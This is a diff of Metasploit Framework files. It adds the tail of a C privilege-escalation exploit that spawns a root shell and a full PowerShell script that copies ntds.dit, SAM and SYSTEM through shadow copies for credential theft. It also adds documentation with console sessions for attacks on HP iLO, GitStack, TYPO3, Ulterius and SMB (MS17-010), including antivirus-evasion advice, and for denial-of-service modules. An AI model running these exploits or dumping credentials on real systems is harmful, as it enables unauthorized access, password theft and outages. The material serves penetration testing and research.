+            return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
+                    ? EXIT_SUCCESS
+                    : EXIT_FAILURE;
+ 
+        // Waitpid failure.
+        return EXIT_FAILURE;
+    }
+ 
+    // If the subprocess returned sccess, the exploit probably worked,
+    // reload with euid zero.
+    if (waitpid(wrapper, &status, 0) == wrapper) {
+        // All done, spawn root shell.
+        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
+            execl(*argv, "w00t", NULL);
+        }
+    }
+ 
+    // Unknown error.
+    errx(EXIT_FAILURE, "unexpected result, cannot continue");
+}
@@ -0,0 +1,21 @@
+%clr%red
+      .:okOOOkdc'           'cdkOOOko:.
+    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
+   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
+  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
+  oOOOOOOOO.%clr%bldMMMM%clr%red.oOOOOoOOOOl.%clr%bldMMMM%clr%red,OOOOOOOOo
+  dOOOOOOOO.%clr%bldMMMMMM%clr%red.cOOOOOc.%clr%bldMMMMMM%clr%red,OOOOOOOOx
+  lOOOOOOOO.%clr%bldMMMMMMMMM%clr%red;d;%clr%bldMMMMMMMMM%clr%red,OOOOOOOOl
+  .OOOOOOOO.%clr%bldMMM%clr%red.;%clr%bldMMMMMMMMMMM%clr%red;%clr%bldMMMM%clr%red,OOOOOOOO.
+   cOOOOOOO.%clr%bldMMM%clr%red.OOc.%clr%bldMMMMM%clr%red'oOO.%clr%bldMMM%clr%red,OOOOOOOc
+    oOOOOOO.%clr%bldMMM%clr%red.OOOO.%clr%bldMMM%clr%red:OOOO.%clr%bldMMM%clr%red,OOOOOOo
+     lOOOOO.%clr%bldMMM%clr%red.OOOO.%clr%bldMMM%clr%red:OOOO.%clr%bldMMM%clr%red,OOOOOl
+      ;OOOO'%clr%bldMMM%clr%red.OOOO.%clr%bldMMM%clr%red:OOOO.%clr%bldMMM%clr%red;OOOO;
+       .dOOo'%clr%bldWM%clr%red.OOOOocccxOOOO.%clr%bldMX%clr%red'xOOd.
+         ,kOl'%clr%bldM%clr%red.OOOOOOOOOOOOO.%clr%bldM%clr%red'dOk,
+           :kk;.OOOOOOOOOOOOO.;Ok:
+             ;kOOOOOOOOOOOOOOOk:
+               ,xOOOOOOOOOOOx,
+                 .lOOOOOOOl.
+                    ,dOd,
+                      .%clr
@@ -0,0 +1,21 @@
+%clr%red
+      .:okOOOkdc'           'cdkOOOko:.
+    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
+   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
+  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
+  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
+  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
+  lOOOOOOOO.         ;d;         ,OOOOOOOOl
+  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
+   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
+    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
+     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
+      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
+       .dOOo   .OOOOocccxOOOO.   xOOd.
+         ,kOl  .OOOOOOOOOOOOO. .dOk,
+           :kk;.OOOOOOOOOOOOO.cOk:
+             ;kOOOOOOOOOOOOOOOk:
+               ,xOOOOOOOOOOOx,
+                 .lOOOOOOOl.
+                    ,dOd,
+                      .%clr
@@ -1,11 +1,9 @@
 ## <%= items[:mod_name] %>
-<p>
 <%= normalize_description(items[:mod_description]) %>
-</p>

 ## Module Name

-<%= Rex::Text.html_encode(items[:mod_fullname]) %>
+<%= CGI::escapeHTML(items[:mod_fullname]) %>

 ## Authors

@@ -47,4 +45,4 @@ No options required.

 ## Basic Usage

-<%= normalize_demo_output(items[:mod_demo]) %>
+<%= normalize_demo_output(items[:mod_demo]) %>
@@ -65,4 +65,4 @@
 </div>
 <% end %>
 </body>
-</html>
+</html>
@@ -0,0 +1,139 @@
+#Complete script created by Koen Riepe (koen.riepe@fox-it.com)
+#New-CabinetFile originally by Iain Brighton: http://virtualengine.co.uk/2014/creating-cab-files-with-powershell/
+function New-CabinetFile {
+    [CmdletBinding()]
+    Param(
+        [Parameter(HelpMessage="Target .CAB file name.", Position=0, Mandatory=$true, ValueFromPipelineByPropertyName=$true)]
+        [ValidateNotNullOrEmpty()]
+        [Alias("FilePath")]
+        [string] $Name,
+ 
+        [Parameter(HelpMessage="File(s) to add to the .CAB.", Position=1, Mandatory=$true, ValueFromPipeline=$true)]
+        [ValidateNotNullOrEmpty()]
+        [Alias("FullName")]
+        [string[]] $File,
+ 
+        [Parameter(HelpMessage="Default intput/output path.", Position=2, ValueFromPipelineByPropertyName=$true)]
+        [AllowNull()]
+        [string[]] $DestinationPath,
+ 
+        [Parameter(HelpMessage="Do not overwrite any existing .cab file.")]
+        [Switch] $NoClobber
+        )
+ 
+    Begin { 
+    
+        ## If $DestinationPath is blank, use the current directory by default
+        if ($DestinationPath -eq $null) { $DestinationPath = (Get-Location).Path; }
+        Write-Verbose "New-CabinetFile using default path '$DestinationPath'.";
+        Write-Verbose "Creating target cabinet file '$(Join-Path $DestinationPath $Name)'.";
+ 
+        ## Test the -NoClobber switch
+        if ($NoClobber) {
+            ## If file already exists then throw a terminating error
+            if (Test-Path -Path (Join-Path $DestinationPath $Name)) { throw "Output file '$(Join-Path $DestinationPath $Name)' already exists."; }
+        }
+ 
+        ## Cab files require a directive file, see 'http://msdn.microsoft.com/en-us/library/bb417343.aspx#dir_file_syntax' for more info
+        $ddf = ";*** MakeCAB Directive file`r`n";
+        $ddf += ";`r`n";
+        $ddf += ".OPTION EXPLICIT`r`n";
+        $ddf += ".Set CabinetNameTemplate=$Name`r`n";
+        $ddf += ".Set DiskDirectory1=$DestinationPath`r`n";
+        $ddf += ".Set MaxDiskSize=0`r`n";
+        $ddf += ".Set Cabinet=on`r`n";
+        $ddf += ".Set Compress=on`r`n";
+        ## Redirect the auto-generated Setup.rpt and Setup.inf files to the temp directory
+        $ddf += ".Set RptFileName=$(Join-Path $ENV:TEMP "setup.rpt")`r`n";
+        $ddf += ".Set InfFileName=$(Join-Path $ENV:TEMP "setup.inf")`r`n";
+ 
+        ## If -Verbose, echo the directive file
+        if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
+            foreach ($ddfLine in $ddf -split [Environment]::NewLine) {
+                Write-Verbose $ddfLine;
+            }
+        }
+    }
+ 
+    Process {
+   
+        ## Enumerate all the files add to the cabinet directive file
+        foreach ($fileToAdd in $File) {
+        
+            ## Test whether the file is valid as given and is not a directory
+            if (Test-Path $fileToAdd -PathType Leaf) {
+                Write-Verbose """$fileToAdd""";
+                $ddf += """$fileToAdd""`r`n";
+            }
+            ## If not, try joining the $File with the (default) $DestinationPath
+            elseif (Test-Path (Join-Path $DestinationPath $fileToAdd) -PathType Leaf) {
+                Write-Verbose """$(Join-Path $DestinationPath $fileToAdd)""";
+                $ddf += """$(Join-Path $DestinationPath $fileToAdd)""`r`n";
+            }
+            else { Write-Warning "File '$fileToAdd' is an invalid file or container object and has been ignored."; }
+        }       
+    }
+ 
+    End {
+    
+        $ddfFile = Join-Path $DestinationPath "$Name.ddf";
+        $ddf | Out-File $ddfFile -Encoding ascii | Out-Null;
+ 
+        Write-Verbose "Launching 'MakeCab /f ""$ddfFile""'.";
+        $makeCab = Invoke-Expression "MakeCab /F ""$ddfFile""";
+ 
+        ## If Verbose, echo the MakeCab response/output
+        if ($PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent) {
+            ## Recreate the output as Verbose output
+            foreach ($line in $makeCab -split [environment]::NewLine) {
+                if ($line.Contains("ERROR:")) { throw $line; }
+                else { Write-Verbose $line; }
+            }
+        }
+ 
+        ## Delete the temporary .ddf file
+        Write-Verbose "Deleting the directive file '$ddfFile'.";
+        Remove-Item $ddfFile;
+ 
+        ## Return the newly created .CAB FileInfo object to the pipeline
+        Get-Item (Join-Path $DestinationPath $Name);
+    }
+}
+
+$key = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters"
+$ntdsloc = (Get-ItemProperty -Path $key -Name "DSA Database file")."DSA Database file"
+$ntdspath = $ntdsloc.split(":")[1]
+$ntdsdisk = $ntdsloc.split(":")[0]
+
+(Get-WmiObject -list win32_shadowcopy).create($ntdsdisk + ":\","ClientAccessible")
+
+$id_shadow = "None"
+$volume_shadow = "None"
+
+if (!(Get-WmiObject win32_shadowcopy).length){
+    Write-Host "Only one shadow clone"
+    $id_shadow = (Get-WmiObject win32_shadowcopy).ID
+    $volume_shadow = (Get-WmiObject win32_shadowcopy).DeviceObject
+} Else {
+    $n_shadows = (Get-WmiObject win32_shadowcopy).length-1
+    $id_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].ID
+    $volume_shadow = (Get-WmiObject win32_shadowcopy)[$n_shadows].DeviceObject
+}
+
+$command = "cmd.exe /c copy "+ $volume_shadow + $ntdspath + " " + ".\ntds.dit"
+iex $command
+
+$command2 = "cmd.exe /c reg save HKLM\SYSTEM .\SYSTEM"
+iex $command2
+
+$command3 = "cmd.exe /c reg save HKLM\SAM .\SAM"
+iex $command3
+
+(Get-WmiObject -Namespace root\cimv2 -Class Win32_ShadowCopy | Where-Object {$_.DeviceObject -eq $volume_shadow}).Delete()
+if (Test-Path "All.cab"){
+   Remove-Item "All.cab" 
+}
+New-CabinetFile -Name All.cab -File "SAM","SYSTEM","ntds.dit"
+Remove-Item ntds.dit
+Remove-Item SAM
+Remove-Item SYSTEM
@@ -0,0 +1,25 @@
+netlogon
+lsarpc
+samr
+browser
+atsvc
+DAV RPC SERVICE
+epmapper
+eventlog
+InitShutdown
+keysvc
+lsass
+LSM_API_service
+ntsvcs
+plugplay
+protected_storage
+router
+SapiServerPipeS-1-5-5-0-70123
+scerpc
+srvsvc
+tapsrv
+trkwks
+W32TIME_ALT
+wkssvc
+PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
+db2remotecmd
@@ -3,24 +3,27 @@

 To run `msfconsole`
 ```bash
-docker-compose build
-docker-compose run --rm --service-ports ms
-```
-or
-```bash
 ./docker/bin/msfconsole
 ```

-To run `msfvenom`
+or
+
 ```bash
 docker-compose build
-docker-compose run --rm --no-deps ms ./msfvenom
+docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms
 ```
-or
+To run `msfvenom`
 ```bash
 ./docker/bin/msfvenom
 ```

+or
+
+```bash
+docker-compose build
+docker-compose run --rm --no-deps -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfvenom
+```
+
 You can pass any command line arguments to the binstubs or the docker-compose command and they will be passed to `msfconsole` or `msfvenom`. If you need to rebuild an image (for example when the Gemfile changes) you need to build the docker image using `docker-compose build` or supply the `--rebuild` parameter to the binstubs.

 ### But I want reverse shells...
@@ -27,4 +27,4 @@ if [[ $PARAMS == *"--rebuild"* ]]; then
  exit $?
 fi

-docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
+docker-compose run --rm --service-ports -e MSF_UID=$(id -u) -e MSF_GID=$(id -g) ms ./msfconsole -r docker/msfconsole.rc "$PARAMS"
@@ -0,0 +1,20 @@
+#!/bin/bash
+
+MSF_USER=msf
+MSF_GROUP=msf
+TMP=${MSF_UID:=1000}
+TMP=${MSF_GID:=1000}
+
+# don't recreate system users like root
+if [ "$MSF_UID" -lt "1000" ]; then
+  MSF_UID=1000
+fi
+
+if [ "$MSF_GID" -lt "1000" ]; then
+  MSF_GID=1000
+fi
+
+addgroup -g $MSF_GID $MSF_GROUP
+adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
+
+su-exec $MSF_USER "$@"
@@ -0,0 +1,42 @@
+This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, which is 100% stable when exploited this way, to create an arbitrary administrator account.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use auxiliary/admin/hp/hp_ilo_create_admin_account`
+3. Set `RHOST`
+4. run `check` to check if remote host is vulnerable (module tries to list accounts using the REST API)
+5. Set `USERNAME` and `PASSWORD` to specify a new administrator account credentials
+6. run `run` to actually create the account on the iLO
+
+## Options
+
+  **USERNAME**
+
+  The username of the new administrator account. Defaults to a random string.
+
+  **PASSWORD**
+
+  The password of the new administrator account. Defaults to a random string.
+
+## Scenarios
+
+### New administrator account creation
+
+```
+msf > use auxiliary/admin/hp/hp_ilo_create_admin_account 
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set RHOST 192.168.42.78
+RHOST => 192.168.42.78
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > check
+[+] 192.168.42.78:443 The target is vulnerable.
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set USERNAME test_user
+USERNAME => test_user
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set PASSWORD test_password
+PASSWORD => test_password
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
+
+[*] Trying to create account test_user...
+[+] Account test_user/test_password created successfully.
+[*] Auxiliary module execution completed
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
+```
@@ -0,0 +1,106 @@
+## Description
+
+GitStack through v2.3.10 contains unauthenticated REST API endpoints that can be used to retrieve information about the application and make changes to it as well. This module generates requests to the vulnerable API endpoints. This module has been tested against GitStack v2.3.10.
+
+## Vulnerable Application
+
+The GitStack application provides REST API functionality to list application users, list application repositories, create application users, etc. Several of the application's REST API endpoints do not require authentication, which allows those with network-level access to the application to take advantage of these unprotected requests.
+
+Application user accounts created through the REST API do not have access to the admin web interface, but the accounts can be added and removed from repositories using additional API requests.
+
+## Actions
+
+**LIST**
+
+List application user accounts. 
+
+Note: The account `everyone` is a default account.
+
+**LIST_REPOS**
+
+List application repositories.
+
+**CREATE**
+
+Create a user account and add the account to all available repositories.
+
+**CLEANUP**
+
+Remove the specified application user account from all available repositories and delete the application account.
+
+## Verification Steps
+
+- [ ] Install a vulnerable GitStack application
+- [ ] Create a few application user accounts
+- [ ] Create a few application repositories
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/gitstack_rest`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify the application user list that is returned
+- [ ] `set action LIST_REPOS`
+- [ ] `run`
+- [ ] Verify the repository list that is returned
+- [ ] `set username <username>`
+- [ ] `set password <password>`
+- [ ] `set action CREATE`
+- [ ] `run`
+- [ ] On the application verify that the user has been created
+- [ ] On the application verify that the user has access to the repositories
+- [ ] `set action CLEANUP`
+- [ ] `run`
+- [ ] On the application verify that the user doesn't have access to the repositories
+- [ ] On the application verify that the user has been deleted
+
+
+
+## Scenarios
+
+### GitStack v2.3.10 on Windows 7 SP1 x64
+
+```
+msfdev@simulator:~/git/metasploit-framework$ ./msfconsole -q -r test.rc 
+[*] Processing test.rc for ERB directives.
+resource (test.rc)> use auxiliary/admin/http/gitstack_rest
+resource (test.rc)> set rhost 172.22.222.122
+rhost => 172.22.222.122
+resource (test.rc)> run
+[*] User List:
+[+] rick
+[+] morty
+[+] everyone
+[*] Auxiliary module execution completed
+resource (test.rc)> set action LIST_REPOS
+action => LIST_REPOS
+resource (test.rc)> run
+[*] Repo List:
+[+] brainalyzer
+[+] c137
+[*] Auxiliary module execution completed
+resource (test.rc)> set action CREATE
+action => CREATE
+resource (test.rc)> run
+[+] SUCCESS: msf:password
+[+] User msf added to brainalyzer
+[+] User msf added to c137
+[*] Auxiliary module execution completed
+resource (test.rc)> set action CLEANUP
+action => CLEANUP
+resource (test.rc)> run
+[+] msf removed from brainalyzer
+[+] msf removed from c137
+[+] msf has been deleted
+[*] Auxiliary module execution completed
+```
+
+After CREATE, but before CLEANUP, use git to clone the remote repositories.
+
+```
+msfdev@simulator:~/money-bugs$ git clone http://msf:password@172.22.222.122/brainalyzer.git
+Cloning into 'brainalyzer'...
+remote: Counting objects: 3, done.
+Unpacking objects: 100% (3/3), done.
+remote: Total 3 (delta 0), reused 0 (delta 0)
+msfdev@simulator:~/money-bugs$ cd brainalyzer/ && ls
+szechuan_sauce.md
+```
@@ -0,0 +1,49 @@
+## Description
+
+News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vulnerability. This module allows an unauthenticated user to exploit the SQL injection vulnerability by generating requests to retrieve the password hash for the admin user of the application. This module has been tested on TYPO3 3.16.0 running news extension 5.0.0.
+
+## Vulnerable Application
+
+In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
+
+To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.
+
+## Options
+
+**PATTERN1** and **PATTERN2**
+
+These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.
+
+**ID**
+
+The value for query parameter `id` of the page that the news extension is running on.
+
+## Verification Steps
+
+- [ ] Install [Typo3 VM](https://www.turnkeylinux.org/download?file=turnkey-typo3-14.1-jessie-amd64.ova)
+- [ ] Launch the VM and configure it
+- [ ] SSH to the VM
+- [ ]  `cd /var/www/typo3/ && composer require georgringer/news:5.0.0`
+- [ ] Login to the web interface
+- [ ] Enable the news extension
+- [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
+- [ ] Enable page
+- [ ] Verify if page is visble to unauthenticated user and note the id
+- [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
+- [ ] Username and password hash should have been retrieved
+
+## Scenarios
+
+### News Module 5.0.0 on TYPO3 3.16.0
+
+```
+msfdev@simulator:~/git/metasploit-framework$ ./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost 172.22.222.136; set id 37; run'
+rhost => 172.22.222.136
+id => 37
+[*] Trying to automatically determine Pattern1 and Pattern2...
+[*] Pattern1: Article #1, Pattern2: Article #2
+[+] Username: admin
+[+] Password Hash: $P$Ch4lme3.gje9o.DjMip59baG7b/mIp.
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/typo3_news_module_sqli) > 
+```
@@ -0,0 +1,64 @@
+## Description
+
+This module exploits a directory traversal vulnerability in [Ulterius Server < v1.9.5.0](https://github.com/Ulterius/server/releases). The directory traversal flaw occurs in Ulterius Server's `HttpServer.Process` function call. While processing file requests, the `HttpServer.Process` function does not validate that the requested file is within the web server's root directory or a subdirectory.
+
+## Vulnerable Application
+
+When requesting a file, a relative or absolute file path is needed so the appropriate request can be generated. Fortunately, Ulterius Server creates a file called `fileIndex.db`, which contains filenames and directories located on the server. By requesting `fileIndex.db` and parsing the retrieved data, absolute file paths can be retrieved for files hosted on the server. Using the information retrieved from parsing `fileIndex.db`, additional requests can be generated to download desired files.
+
+As noted in the [EDB PoC](https://www.exploit-db.com/exploits/43141/), the `fileIndex.db` is usually located at:
+
+`http://ulteriusURL:22006/.../fileIndex.db`
+
+Note: 22006 was the default port after setting up the Ulterius Server.
+
+After retrieving absolute paths for files, the files can be retrieved by sending requests of the form:
+
+`http://ulteriusURL:22006/<DriveLetter>:/<path>/<to>/<file>`
+
+Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative paths to download files but absolute paths can be used on Windows-platforms as well, because the `HttpServer.Process` function made use of the [Path.Combine](https://msdn.microsoft.com/en-us/library/fyy7a5kt(v=vs.110).aspx) function.
+
+> If *path2* includes a root, *path2* is returned. 
+
+## Options
+
+**PATH**
+
+This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
+
+Note: If you are using relative paths, use three periods when traversing down a level in the directory structure. If absolute paths are used, make sure to include the drive letter.
+
+## Verification Steps
+
+- [ ] Install Ulterius Server < v1.9.5.0
+- [ ] `./msfconsole`
+- [ ] `use auxiliary/admin/http/ulterius_file_download`
+- [ ] `set rhost <rhost>`
+- [ ] `run`
+- [ ] Verify loot contains file system paths from remote file system.
+- [ ] `set path '<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `run`
+- [ ] Verify contents of file
+
+## Scenarios
+
+### Ulterius Server v1.8.0.0 on Windows 7 SP1 x64.
+
+```
+msf5 > use auxiliary/admin/http/ulterius_file_download
+msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122
+rhost => 172.22.222.122
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] Starting to parse fileIndex.db...
+[*] Remote file paths saved in: filepath0
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt'
+path => C:/users/pwnduser/desktop/tmp.txt
+msf5 auxiliary(admin/http/ulterius_file_download) > run
+
+[*] C:/users/pwnduser/desktop/tmp.txt
+[*] File contents saved: filepath1
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/http/ulterius_file_download) >
+```
@@ -0,0 +1,91 @@
+## Introduction
+
+MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
+
+You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
+
+* CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
+* CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests
+
+This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
+
+## Vulnerable Server
+
+To be able to use auxiliary/admin/smb/ms17_010_command:
+
+1. You can OPTIONALLY use a valid username/password to bypass most of these requirements.
+2. The firewall must allow SMB traffic.
+3. The target must use SMBv1.
+4. The target must be missing the MS17-010 patch.
+5. The target must allow anonymous IPC$ and a Named Pipe.
+
+You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
+
+If you're having trouble configuring an anonymous named pipe,
+Microsoft's
+[documentation](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously)
+on the topic may be helpful.
+
+## Verification Steps
+
+At the minimum, you should be able use psexec to get a session with a valid credential using the following:
+
+```
+msf > use auxiliary/admin/smb/ms17_010_command
+msf exploit(psexec) > set RHOSTS 192.168.1.80
+RHOSTS => 192.168.1.80
+msf exploit(psexec) > exploit
+```
+
+## Options
+
+By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.
+
+**The NAMEDPIPE Option**
+
+By default, the module will scan for a list of common pipes for any available one. You can specify one by name.
+
+**The LEAKATTEMPTS Option**
+
+Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.
+
+**The DBGTRACE Option**
+
+Used to debug, gives extremely verbose information.
+
+**The SMBUser Option**
+
+This is a valid Windows username.
+
+**The SMBPass option**
+
+This can be either the plain text version or the Windows hash.
+
+## Scenarios
+
+**Automatic Target**
+
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+
+**Powershell Target**
+
+The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
+
+Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
+
+**Native Upload Target**
+
+The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the
+SHARE datastore option), and then execute it with psexec.
+
+This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
+
+**MOF Upload Target**
+
+The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
+format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
+
+Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting
+caught by antivirus on the target.
+
+The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  Versions <= 1.20 of the Debut embedded httpd web server in use by Brother printers are vulnerable to denial of service 
+  via a crafted HTTP request. This module will render the printer unresponsive from requests for ~300 seconds.
+  This is thought to be caused by a single threaded web server which
+  has a ~300 second timeout value.  By sending a request with a content-length larger than the actual data, the server waits
+  to receive the rest of the data, which doesn't happen until the timeout occurs.  This DoS is for all services, not just http.
+
+  This module was successfully tested against a Brother HL-L2380DW series.
+
+  An nmap version scan of the vulnerable service should look similar to:
+  `80/tcp open  http    Debut embedded httpd 1.20 (Brother/HP printer http admin)`.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/dos/http/brother_debut_dos```
+  3. Do: ```set rhost [ip]```
+  4. Do: ```run```
+  5. You should see Success, and manual attempts to browse the web interface don't load.
+
+## Scenarios
+
+### Brother HL-L2380DW with Debut embedded 1.20
+
+```
+resource (brother.rc)> use auxiliary/dos/http/brother_debut_dos
+resource (brother.rc)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (brother.rc)> exploit
+[*] Sending malformed POST request at 2018-01-24 20:45:52.
+[+] 1.1.1.1:80 - Connection Refused: Success! Server will recover about 2018-01-24 20:50:52
+[*] Auxiliary module execution completed
+```
@@ -3,7 +3,7 @@
  This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
  Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
  See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
-  
+
  The module opens over 64,000 connections to the target service, so please make sure
  your system ULIMIT is set appropriately to handle it. A single host running this module
  can theoretically consume up to 8GB of memory on the target.
@@ -14,7 +14,7 @@

  1. Start msfconsole
  1. Do: `use auxiliary/dos/smb/smb_loris`
-  1. Do: `set RHOST [IP]`
+  1. Do: `set rhost [IP]`
  1. Do: `run`
  1. Target should allocate increasing amounts of memory.

@@ -30,14 +30,11 @@ msf auxiliary(smb_loris) >

 msf auxiliary(smb_loris) > run

-[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
-[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
-....
+[*] Starting server...
+[*] 192.168.172.138:445 - 100 socket(s) open
+[*] 192.168.172.138:445 - 200 socket(s) open
+...
+[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
+[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
+...
 ```
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+Vulnerable application versions include:
+Claymore Dual GPU Miner<=10.5
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/dos/tcp/claymore_doc`
+3. Do: `set rhost`
+4. Do: `run`
+5. check your miner.
+
+## Scenarios
+
+### Claymore Dual GPU Miner/10.0 - window7
+
+```
+msf5 > use auxiliary/dos/tcp/claymore_dos
+msf5 auxiliary(dos/tcp/claymore_dos) > show options
+
+Module options (auxiliary/dos/tcp/claymore_dos):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   rhost                   yes       The target address
+   rport  3333             yes       The target port
+
+msf5 auxiliary(dos/tcp/claymore_dos) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf5 auxiliary(dos/tcp/claymore_dos) > run
+
+[*] Starting server...
+[*] Creating sockets...
+[*] Auxiliary module execution completed
+```
+
+
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+This module retrieves a browser's network interface IP addresses using WebRTC. However, after visiting the HTTP server, the browser can disclose a private IP address in a STUN request.
+
+Related links : https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html
+
+## Verification
+
+    Start msfconsole
+    use auxiliary/gather/browser_lanipleak
+    Set SRVHOST
+    Set SRVPORT
+    run (Server started)
+Visit server URL in any browser which has WebRTC enabled
+
+## Scenarios
+
+```
+msf auxiliary(gather/browser_lanipleak) > show options 
+
+Module options (auxiliary/gather/browser_lanipleak):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  192.168.1.104    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   WebServer  
+
+
+msf auxiliary(gather/browser_lanipleak) > run
